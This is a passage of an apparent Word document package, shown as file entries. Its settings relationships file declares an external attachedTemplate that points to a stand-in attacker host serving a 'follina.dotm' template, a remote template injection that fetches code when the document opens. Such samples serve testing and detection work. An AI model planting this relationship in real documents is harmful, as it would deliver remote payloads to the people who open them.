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1"/>
</w:settings>
</file>

<file path=word/_rels/settings.xml.rels><?xml version="1.0"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdT1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://attacker.example/follina.dotm" TargetMode="External"/></Relationships>
</file>